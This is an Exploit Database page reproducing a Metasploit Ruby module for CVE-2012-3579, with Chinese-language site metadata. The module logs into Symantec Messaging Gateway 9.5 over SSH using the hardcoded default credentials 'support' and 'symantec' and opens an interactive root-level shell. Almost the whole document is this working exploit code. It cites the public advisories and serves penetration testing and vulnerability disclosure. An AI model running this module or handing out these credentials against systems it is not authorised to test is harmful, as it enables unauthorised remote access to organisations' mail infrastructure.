Symantec Messaging Gateway 9.5/9.5.1 – SSH Default Password Security Bypass (Metasploit)

• Exploit Database
• 17 阅读

• 作者： Metasploit
  日期： 2012-08-30
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/21136/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  require 'net/ssh'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Auxiliary::CommandShell
  
  def initialize(info={})
  super(update_info(info,
  'Name' => "Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability",
  'Description'=> %q{
  This module exploits a default misconfiguration flaw on Symantec Messaging Gateway.
  The 'support' user has a known default password, which can be used to login to the
  SSH service, and gain privileged access from remote.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'Stefan Viehbock',#Original discovery
  'Ben Williams', #Reporting the vuln + coordinated release
  'sinn3r'#Metasploit
  ],
  'References' =>
  [
  ['CVE', '2012-3579'],
  ['OSVDB', '85028'],
  ['BID', '55143'],
  ['URL', 'https://www.sec-consult.com/files/20120829-0_Symantec_Mail_Gateway_Support_Backdoor.txt'],
  ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00']
  ],
  'DefaultOptions'=>
  {
  'ExitFunction' => "none"
  },
  'Payload'=>
  {
  'Compat' => {
  'PayloadType'=> 'cmd_interact',
  'ConnectionType' => 'find'
  }
  },
  'Platform' => 'unix',
  'Arch' => ARCH_CMD,
  'Targets'=>
  [
  ['Symantec Messaging Gateway 9.5', {}],
  ],
  'Privileged' => true,
  #Timestamp on Symantec advisory
  #But was found on Jun 26, 2012
  'DisclosureDate' => "Aug 27 2012",
  'DefaultTarget'=> 0))
  
  register_options(
  [
  Opt::RHOST(),
  Opt::RPORT(22)
  ], self.class
  )
  
  register_advanced_options(
  [
  OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
  OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
  ]
  )
  end
  
  
  def rhost
  datastore['RHOST']
  end
  
  
  def rport
  datastore['RPORT']
  end
  
  
  def do_login(user, pass)
  opts = {
  :auth_methods => ['password', 'keyboard-interactive'],
  :msframework=> framework,
  :msfmodule=> self,
  :port => rport,
  :disable_agent => true,
  :config => false,
  :password => pass,
  :record_auth_info => true,
  :proxies => datastore['Proxies']
  }
  
  opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
  
  begin
  ssh = nil
  ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
  ssh = Net::SSH.start(rhost, user, opts)
  end
  rescue Rex::ConnectionError, Rex::AddressInUse
  return
  rescue Net::SSH::Disconnect, ::EOFError
  print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
  return
  rescue ::Timeout::Error
  print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
  return
  rescue Net::SSH::AuthenticationFailed
  print_error "#{rhost}:#{rport} SSH - Failed authentication"
  rescue Net::SSH::Exception => e
  print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
  return
  end
  
  if ssh
  conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
  ssh = nil
  return conn
  end
  
  return nil
  end
  
  
  def exploit
  user = 'support'
  pass = 'symantec'
  
  print_status("#{rhost}:#{rport} - Attempt to login...")
  conn = do_login(user, pass)
  if conn
  print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'")
  handler(conn.lsock)
  end
  end
  end